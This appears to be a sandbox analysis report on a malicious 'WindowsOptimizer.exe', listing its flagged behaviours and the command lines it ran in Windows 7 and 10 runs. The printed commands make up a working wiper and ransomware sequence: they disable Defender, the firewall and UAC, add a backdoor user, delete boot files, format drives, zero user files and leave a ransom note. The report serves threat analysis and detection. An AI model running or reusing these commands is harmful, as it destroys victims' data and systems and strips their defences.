Analysis Overview
SHA256
d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
Threat Level: Known bad
The file WindowsOptimizer.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies boot configuration data using bcdedit
Disables RegEdit via registry modification
Stops running service(s)
Disables Task Manager via registry modification
Modifies Windows Firewall
Writes to the Master Boot Record (MBR)
Indicator Removal: File Deletion
Enumerates connected drives
Launches sc.exe
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Runs net.exe
Suspicious use of SendNotifyMessage
Modifies registry key
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 21:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 21:27
Reported
2024-11-09 21:58
Platform
win7-20240903-en
Max time kernel
2s
Max time network
3s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\X: | C:\Windows\system32\mountvol.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\system32\format.com | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\format.com | N/A |
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
C:\Windows\system32\sc.exe
sc config wuauserv start=disabled
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
C:\Windows\system32\net.exe
net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"
C:\Windows\system32\cipher.exe
cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
C:\Windows\system32\bcdedit.exe
bcdedit /delete {bootmgr} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {default} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /s
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"
C:\Windows\system32\mountvol.exe
mountvol X: /s
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /d
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"
C:\Windows\system32\mountvol.exe
mountvol X: /d
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"
C:\Windows\system32\format.com
format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
C:\Windows\system32\format.com
format D: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
C:\Windows\system32\format.com
format E: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 21:27
Reported
2024-11-09 21:28
Platform
win10v2004-20241007-en
Max time kernel
2s
Max time network
3s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\system32\format.com | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\format.com | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\mountvol.exe | N/A |
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
| N/A | N/A | C:\Windows\system32\efsui.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
C:\Windows\system32\sc.exe
sc config wuauserv start=disabled
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
C:\Windows\system32\net.exe
net user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
C:\Windows\system32\cipher.exe
cipher /E /A /S:C:\Users\Admin\Desktop
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {bootmgr} /f
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
C:\Windows\system32\bcdedit.exe
bcdedit /delete {default} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /s
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"
C:\Windows\system32\mountvol.exe
mountvol X: /s
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol X: /d
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"
C:\Windows\system32\mountvol.exe
mountvol X: /d
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"
C:\Windows\system32\format.com
format C: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
C:\Windows\system32\format.com
format D: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
C:\Windows\system32\format.com
format E: /fs:raw /q /y
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current} /f
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
